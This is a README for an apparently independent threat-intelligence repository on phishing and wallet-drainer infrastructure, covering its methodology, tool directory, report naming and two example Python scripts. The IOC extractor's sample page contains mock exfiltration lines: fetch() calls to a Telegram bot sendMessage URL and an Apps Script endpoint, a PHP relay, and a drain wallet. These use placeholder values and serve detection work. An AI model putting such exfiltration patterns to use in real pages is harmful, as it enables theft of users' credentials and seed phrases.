AtomLab1 is an independent digital risk and open-source intelligence (OSINT) research initiative focused on identifying, analyzing, and documenting online scam and phishing infrastructure.
This repository serves as a structured intelligence archive of real-world investigations into:
- Phishing campaigns
- Brand impersonation websites
- Wallet drainer operations
- Fraudulent online platforms
- Malicious APK distribution
- Scam infrastructure and attacker tooling
All investigations are conducted using publicly accessible information and follow strict ethical OSINT principles.
AtomLab1 emphasizes structured evidence documentation, infrastructure pattern recognition, and intelligence-grade reporting discipline.
The objective of AtomLab1 is to:
- Detect newly emerging scam infrastructure
- Analyze attacker tactics, techniques, and procedures (TTPs)
- Correlate malicious infrastructure patterns across campaigns
- Extract actionable Indicators of Compromise (IOCs)
- Develop structured digital risk investigation methodology
- Promote awareness and defensive intelligence practices
This project reflects a proactive digital risk detection mindset rather than reactive incident reporting.
This document defines the standardized, repeatable methodology used for every CTI report in this portfolio. The core toolkit (recon, web analysis, APK analysis, threat feeds, blockchain tracing) is free / open-source or has a generous free tier, so no paid enterprise license is required to follow the methodology; the extended tool directory further down, drawn from curated OSINT lists, also includes commercial platforms such as Recorded Future, Videris and i2 Analyst's Notebook.
- Passive-first approach
- Multi-source verification
- Reproducibility & zero-harm testing
- Attack Chain Reconstruction (Cyber Kill Chain + MITRE ATT&CK)
- Target Identification & Triage
- Domain / Infrastructure Recon
- Web & Traffic Analysis
- APK / Malware Analysis
- Scam / Threat Feed Cross-Check
- Web3 / Blockchain Tracing
- Attack Chain & Risk Assessment
- Professional Report Writing
- AtSameIP – Find all websites hosted on the same host (IP address)
- subfinder – Fast passive subdomain enumeration (download latest release)
- Amass – OWASP attack surface mapping & asset discovery
- findomain – Cross-platform subdomain enumerator
- assetfinder – Passive asset discovery
- Sublist3r – Subdomain enumeration (Python)
- SecurityTrails – Historical & passive DNS (free tier)
- DNSDumpster – Free DNS reconnaissance web tool
- Censys – Internet-wide asset search (free account)
- Shodan – Search engine for Internet-connected devices (free tier)
- Wayback Machine – Historical website snapshots
- Recon-ng – Full-featured reconnaissance framework
- theHarvester – Email, subdomain & employee OSINT
- SpiderFoot – Automated OSINT collection & correlation
- gobuster – Directory & DNS brute-forcing
- feroxbuster – Fast recursive content discovery
- dirb – Classic web content scanner
- katana – Next-generation crawling & spidering (ProjectDiscovery)
- nmap – Network discovery & security auditing
- Wappalyzer – Web technology fingerprinting (browser extension + online)
- BuiltWith – Website technology profiler
- WhatWeb – Website identification engine
- Burp Suite Community Edition – Web proxy & traffic interception (official download)
- OWASP ZAP – Free & open-source web app scanner
- urlscan.io – Website scanner & threat analysis (web-based)
- CheckPhish.ai – AI-powered phishing & threat detection (free scans)
- URLVoid – URL reputation & threat check (web-based)
- URLhaus – Real-time malicious URL database
- MalwareBazaar – Free malware sample repository (APKs included)
- ThreatFox – IoC sharing platform (abuse.ch)
- PhishTank – Community-driven phishing URL database
- OpenPhish – Real-time phishing feed
- AlienVault OTX – Open Threat Exchange (free account)
- VirusTotal – File & URL scanner (free tier)
- Hybrid-Analysis – Automated malware analysis (free)
- Any.Run – Interactive malware sandbox (free tier)
- MobSF (Mobile Security Framework) – All-in-one Android/iOS/Windows analysis (official repo + Docker)
- Apktool – Android APK reverse engineering
- Jadx-GUI – Dex to Java decompiler (GUI version)
- Frida – Dynamic instrumentation toolkit
- Ghidra – NSA reverse-engineering framework (download)
Explorers
- Etherscan – Ethereum blockchain explorer
- Blockchair – Multi-crypto blockchain explorer
- Solscan – Solana blockchain explorer
Analytics & Tracing
- Arkham Intelligence – On-chain intelligence & entity tracking
- Breadcrumbs.app – Visual address clustering & fund flow
- ChainAbuse – Crypto scam reporting database
- BitcoinAbuse – Bitcoin scam address database
- Dune Analytics – On-chain query dashboard (free)
Awesome Web3 OSINT List: aaarghhh/awesome_osint_blockchain_analysis
- Maltego CE – Community Edition link analysis
- ExifTool – Metadata reader/writer
- OSINT Framework – Web-based OSINT tool directory (clickable tree)
- Awesome OSINT (jivoi) – Most starred OSINT list
- Awesome OSINT (awesomelistsio) – High-quality curated edition
- Awesome OSINT For Everything – 200+ categories
- Awesome Intelligence – Threat intel focus
These tools are sourced from the Awesome OSINT repository and additional 2026 research, focusing on threat actor profiling, cyber threat maps, and intelligence feeds for monitoring criminal activities.
- Abusech – Hunt across all abuse.ch platforms with one simple query
- Cisco Talos Intelligence – IP and Domain Reputation Center for real-time threat detection
- Cloudflare Radar – Internet traffic patterns, attacks, and technology trends
- Criminal IP – Cyber Threat Intelligence search engine and Attack Surface Management (ASM) platform
- Fortiguard Labs – FortiGuard Outbreak Alerts for on-going cybersecurity attacks
- HCL Threat Map – Cyber Threat Map by HCLTech
- IBM X-Force Exchange – Current Malicious Activity map
- Imperva Live Threat Map – Real-time global view of DDoS attacks, hacking attempts, and bot assaults
- Kaspersky Cyberthreat Map – Live cyber-attack map
- LIONIC Cyber Threat Map – Global cyber threat visualization
- NETSCOUT Cyber Threat Map – Real-Time DDoS Attack Map
- Radware Live Cyber Threat Map – Near real-time information about cyberattacks
- Secure Gateway Live Cyber Threat Map – Live cyber threat visualization
- Thales Cyberthreat Map – Cybersecurity trends with targeted areas, attacks, sectors, and malware
- ThreatsEye – Real-time visualization of global cyber attacks and threats
- Zscaler Global Threat Map Dashboard – 24-hour threats detected by antivirus engines and APTs
- APT Groups and Operations – Threat actors, sponsored countries, tools, methods
- APTWiki – Historical wiki with 214 actor entries
- Bi.Zone – 148 threat groups with detailed TTPs
- BreachHQ – List of all known cyber threat actors
- Cybergeist – Intelligence profiles about key threats and context
- Dark Web Informer – Tracking 854 Threat Actors
- ETDA – Search for Threat Actor groups and tools
- FortiGuard Labs – Actionable insights on threat actors
- KNOWLEDGENOW – Trending Threats
- lazarusholic – Total 203 threat actors
- Malpedia – List of threat actor groups
- MISP Galaxy – Adversary groups identified by 360.net
- OPENHUNTING.IO – Threat Library Collecting Information
- SOCRadar LABS – Threat actor profiles and activities
- Thales – Threat actor groups in graphical explorer
- Bitdefender Threat Map – Cyberthreat Real Time Map
- BunkerWeb Live Cyber Attack Threat Map – Live cyber attacks blocked by BunkerWeb
- Check Point Live Cyber Threat Map – Top cyber threats of 2026
- Threat Actor Usernames Scrape – 350k+ threat actor usernames from cybercrime sources
- GitGuardian – Monitor public GitHub for secrets
- OnionScan – Tool for investigating the Dark Web
- onion-lookup – Check Tor hidden services and metadata
- OTX AlienVault – Open Threat Exchange for collaborative threat sharing
- PhishingSecLists – Lists for fuzzing phishing and scam sites
- REScure Threat Intel Feed – Independent threat intelligence project
- Columbus Project – Advanced subdomain discovery service
- Merklemap – Enumerate all subdomains from certificate transparency logs
- aa419 Fake Sites Database – Fraudulent websites identified by Artists Against 419
- AbuseIPDB – Repository of abuse reports for IPs, domains, and subnets
- BGP.tools – Modern BGP toolkit for network reconnaissance
- BrightCloud – Reputation, category, and threats for URL or IP
- CertKit Certificate Search – Search for public SSL/TLS certificates
- FOFA – Asset search and analysis tool
- FullHunt – Secure External Attack Surface
- GreyNoise – Search exposed Internet assets and malicious IPs
- Hunter Search Engine – Search Exposed Internet assets
- Intelligence X – Search across dark web and data leaks
- Netlas.io – Network asset discovery
- ODIN – Search for Hosts, CVEs, Exposed Buckets
- Search AbuseIPDB – Query IPs and ranges in AbuseIPDB
- Shadowserver – Global cyber threat statistics
These tools help in tracking malware locations, analyzing samples, and disassembling code to understand criminal techniques.
- MalwareBazaar – Search and download malware samples by hash, family, tag
- YARAify – Collaborative YARA engine for file pattern matching
- Cuckoo Sandbox – Open-source automated malware analysis system
- x64dbg – Open-source debugger for Windows binaries
- Wireshark – Network protocol analyzer for malware traffic
- Radare2 (r2) – Reverse engineering framework for static malware analysis
- IDA Pro – Interactive disassembler for binary analysis (free version available)
- OllyDbg – 32-bit debugger for Windows malware
- ClamAV – Open-source antivirus for malware detection
- Snort – Network intrusion detection for malware tracking
- Suricata – Network threat detection engine
- awesome-malware-analysis – Curated list of malware analysis tools
Tools focused on identifying, scanning, and analyzing scam websites and phishing campaigns.
- PhishStats – Phishing statistics and database
- urlDNA – Analyze URLs, monitor brands, track phishing sites
- Islegitsite – Checks website trustworthiness and security
- CredenShow – Identify compromised credentials
- HIB Ransomed – Check if data has been leaked
- HEROIC.NOW – Dark web data leak scanner
- IKnowYour.Dad – Data Breach Search Engine
- StealSeek – Search and analyze data breaches
- Venacus – Search for data breaches and notifications
- Ahmia – Dark Web Search Engine
- Aleph Open Search – Dark Web Search Engine
- DataSploit – Aggregates data from multiple sources
- Cyble ODIN – Scans internet assets, exposed buckets, vulnerabilities
- Google Dorks – Specialized Google queries for investigations
- NexVision – Large OSINT data pool for surface/dark web
- Hudson Rock – Cybercrime intelligence API
- Metagoofil – Metadata extraction from documents
- Recon-Ng – Reconnaissance framework
- Check Usernames – Username availability checker
- TinEye – Reverse image search
- Creepy – Geolocation OSINT tool
- Videris – Full-spectrum OSINT for collection and analysis
- i2 Analyst’s Notebook – Data visualization and analysis
- OSINT Industries – Tools for online investigations, fraud detection
- SL Crimewall – All-in-one OSINT for investigations
- Recorded Future – Threat intelligence with darknet monitoring
- Hunt.io – Tracks malicious infrastructure, C2 servers
- BeVigil-CLI – Searches assets from mobile apps
- Cyberbro – Searches and checks reputation of observables
- CyberGordon – Threat intelligence search with 30+ sources
- Discoshell – Discovery script using multiple tools
- FOCA – Metadata and hidden info finder
- GreyNoise – Anti-threat intelligence for Internet background noise
- IntelHub – Browser-based OSINT extension
- Orbit – Crypto wallet relationships crawler
- OSINT-Tool – Browser extension for OSINT utilities
- OSINT.SH – Information Gathering Toolset
- Photon – Crawler for OSINT
- SerpApi – Scrapes search engines
- SerpScan – PHP script for dorking
- Sintelix – Graphical link analysis for OSINT
- sn0int – Semi-automatic OSINT framework
- SpiderSuite – GUI web security crawler
- Sub3 Suite – Intelligence gathering suite
- Unfurl – Breaks down URLs for forensics
- Waybackurls – Fetches URLs from Wayback Machine
- Zen – Finds email addresses of GitHub users
- Lampyre – All-in-one OSINT for people, businesses, crypto
- Social Links (Crimewall) – Social media and dark web investigations
- Delivery (email, ad, fake site)
- Landing / Social Engineering
- Credential Harvesting / Seed Phrase Theft
- Proxy / C2 Layer (e.g., secureproxy.php)
- Exfiltration (Telegram bot, Google Apps Script, blockchain)
- Monetization (wallet drain, ransomware, etc.)
- Infrastructure Attribution (Cloudflare, Gandi, registrar, developer OSINT)
Cross-referenced with MITRE ATT&CK:
- TA0001 Initial Access
- TA0006 Credential Access
- TA0010 Exfiltration
- TA0040 Impact
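As an added example (not the project's own code), the Python script below runs a regex-based IOC extractor over a constructed page fragment and tags each hit with one of the attack-chain stages and ATT&CK tactics listed above. The hosts, bot token, Apps Script deployment ID and wallet address in the sample are made up (reserved `.example`/`.invalid` names and dummy values); the assignment of an IOC type to a stage/tactic is this example's own heuristic, not a rule from the methodology. The URL shapes for the Telegram Bot API and Apps Script web apps are the real service formats.

```python
import re
from dataclasses import dataclass

# Constructed sample input, not a real kit: a fragment in the style of the
# client-side script on a seed-phrase harvesting page. Hosts use the reserved
# .example/.invalid names; the bot token, deployment ID and address are dummies.
SAMPLE_PAGE = r"""
var proxy = "https://wallet-restore-support.example/secureproxy.php";
fetch("https://api.telegram.org/bot123456789:AAE012345678901234567890123456789ab/sendMessage");
fetch("https://script.google.com/macros/s/AKfycbDummyDeploymentIdForIllustration/exec");
var drainTo = "0x1111111111111111111111111111111111111111";
window.location = "https://cdn-assets.invalid/verify";
"""

# Stage names are the attack-chain stages of this methodology; tactic IDs are the
# four ATT&CK tactics it cross-references. Which stage an IOC type lands in is an
# assumption of this example (adjust per report).
STAGE_MAP = {
    "telegram_bot": ("Exfiltration", "TA0010"),
    "apps_script":  ("Exfiltration", "TA0010"),
    "eth_address":  ("Monetization", "TA0040"),
    "php_proxy":    ("Proxy / C2 Layer", "TA0006"),
    "host":         ("Landing / Social Engineering", "TA0001"),
}

PATTERNS = {
    # Bot API URL: https://api.telegram.org/bot<id>:<35-char secret>/<method>
    "telegram_bot": re.compile(r"https://api\.telegram\.org/bot(\d{6,12}:[A-Za-z0-9_-]{35})/\w+"),
    # Apps Script web-app deployment URL
    "apps_script":  re.compile(r"https://script\.google\.com/macros/s/([A-Za-z0-9_-]+)/exec"),
    # EVM address: 0x + 40 hex digits
    "eth_address":  re.compile(r"\b0x[a-fA-F0-9]{40}\b"),
    # Server-side relay script, the pattern the methodology cites (secureproxy.php)
    "php_proxy":    re.compile(r"https?://[A-Za-z0-9.-]+/[\w/.-]*\.php\b"),
    "host":         re.compile(r"https?://([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)"),
}

# Legitimate services abused as exfiltration channels: reported via the specific
# patterns above, never as attacker-controlled hosts (keeps them off blocklists).
ABUSED_SERVICES = {"api.telegram.org", "script.google.com"}


@dataclass(frozen=True)
class IOC:
    kind: str
    value: str
    defanged: str
    stage: str
    tactic: str


def defang(value: str) -> str:
    """Render a URL, host or token so it cannot be clicked or auto-linked."""
    return value.replace("http", "hxxp").replace(".", "[.]")


def extract_iocs(text: str) -> list[IOC]:
    """Return deduplicated IOCs from page text, each tagged with stage and tactic."""
    found: dict[tuple[str, str], IOC] = {}
    for kind, pattern in PATTERNS.items():
        for m in pattern.finditer(text):
            value = m.group(1) if m.groups() else m.group(0)
            if kind == "host" and value in ABUSED_SERVICES:
                continue
            stage, tactic = STAGE_MAP[kind]
            found.setdefault((kind, value), IOC(kind, value, defang(value), stage, tactic))
    return list(found.values())


if __name__ == "__main__":
    for ioc in extract_iocs(SAMPLE_PAGE):
        print(f"{ioc.tactic} {ioc.stage:<30} {ioc.kind:<13} {ioc.defanged}")
```

Run on the sample this yields six IOCs: the bot token and deployment ID (exfiltration channel, the token is what you report to the abused service), the drain address (monetization), the `secureproxy.php` relay (proxy/C2) and two attacker hosts, all defanged for the report.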
This methodology + hyperlinked tool directory is publicly shared to demonstrate transparency, professionalism, and depth of knowledge to potential employers in the OSINT / Cyber Threat Intelligence field.
All reports in this repository follow a standardized naming structure.
File format (AI-assisted investigation, named after the primary domain; <date> is DDMMYYYY):
CTI-<date>-<domain-name>
Example:
CTI-23022026-grafenocliente.digital
Meaning:
- Investigation conducted using an AI-assisted automation workflow
- Includes automated data aggregation, structured analysis, and human review
- Follows evidence-controlled OSINT framework
File format (manual investigation, named with a descriptive hyphenated title; <date> is DDMMYYYY):
CTI-<date>-<Normal-Title>
Example:
CTI-23022026-Fake-Trezor-Phishing-Campaign
Meaning:
- Fully conducted manually
- Deep infrastructure analysis and campaign correlation performed directly by the author
- No automated AI structuring used for primary analysis
This distinction ensures transparency regarding methodology and investigative depth.
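As an added example (not the project's own tooling), the Python below parses report filenames under the two conventions above, validates the DDMMYYYY date, and classifies each report as AI-assisted (domain-named) or manual (title-named). The rule for telling a domain from a title is this example's assumption; the two README examples are used as input together with two constructed names.

```python
import re
from dataclasses import dataclass
from datetime import date

# CTI-<date>-<domain-name> marks an AI-assisted investigation, CTI-<date>-<Normal-Title>
# a manual one. <date> is DDMMYYYY (the README example CTI-23022026-... is 23 Feb 2026).
NAME_RE = re.compile(r"^CTI-(\d{2})(\d{2})(\d{4})-(.+)$")

# Assumption of this example: the subject is a domain name when it is dot-separated
# DNS labels ending in a letters-only TLD; anything else is treated as a title.
DOMAIN_RE = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,}$", re.IGNORECASE)

# Two names from the README plus two constructed ones (the .example host is made up).
SAMPLE_NAMES = [
    "CTI-23022026-grafenocliente.digital",
    "CTI-23022026-Fake-Trezor-Phishing-Campaign",
    "CTI-05012026-wallet-restore-support.example",
    "CTI-14032026-Malicious-APK-Dropper-Wave",
]


@dataclass(frozen=True)
class ReportName:
    report_date: date
    subject: str
    workflow: str  # "ai-assisted" (domain-named) or "manual" (title-named)


def parse_report_name(name: str) -> ReportName:
    """Parse one report filename; reject names that break the convention or carry an impossible date."""
    m = NAME_RE.match(name)
    if not m:
        raise ValueError(f"not a CTI report name: {name!r}")
    dd, mm, yyyy, subject = m.groups()
    try:
        report_date = date(int(yyyy), int(mm), int(dd))  # e.g. 31022026 is rejected here
    except ValueError as exc:
        raise ValueError(f"invalid DDMMYYYY date in {name!r}: {exc}") from exc
    workflow = "ai-assisted" if DOMAIN_RE.match(subject) else "manual"
    return ReportName(report_date, subject, workflow)


def index_reports(names: list[str]) -> dict[str, list[str]]:
    """Group report names by workflow, oldest first (DDMMYYYY does not sort as a plain string)."""
    index: dict[str, list[str]] = {"ai-assisted": [], "manual": []}
    parsed = sorted(((parse_report_name(n), n) for n in names), key=lambda p: p[0].report_date)
    for report, name in parsed:
        index[report.workflow].append(name)
    return index


if __name__ == "__main__":
    for workflow, names in index_reports(SAMPLE_NAMES).items():
        print(workflow, names)
```

Because the date is day-first, a plain alphabetical directory listing does not give chronological order; the index above sorts on the parsed date instead.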
- Digital risk detection
- Phishing infrastructure analysis
- Scam campaign correlation
- OSINT-based threat intelligence reporting
- IOC documentation and classification
- Infrastructure pivoting and correlation
- Pattern recognition across campaigns
- Evidence-based analytical reasoning
- Ethical open-source investigation discipline
All research within AtomLab1 adheres to the following principles:
- Only publicly accessible data is analyzed
- No unauthorized access or intrusion is performed
- No exploitation of vulnerabilities
- No bypass of authentication mechanisms
- No handling of private or leaked data
The focus is defensive intelligence and digital risk awareness.
AtomLab1 is authored and maintained by Jake Lo, an independent Digital Risk & OSINT Researcher.
This repository represents hands-on investigative work into real-world scam infrastructure, emerging phishing campaigns, and malicious online ecosystems.
The project reflects a structured approach to intelligence production, evidence control, and analytical discipline in digital risk research.
- Email: [email protected]
- LinkedIn: https://www.linkedin.com/in/lo-jake-b710643b1/
This repository is intended for educational, research, and defensive intelligence purposes only.
All findings are derived from publicly observable information at the time of investigation. No claim is made regarding legal determination of criminal activity.
Assessments reflect OSINT-based analysis and documented evidence at the time of reporting.
Stay alert. Detect early. Document clearly.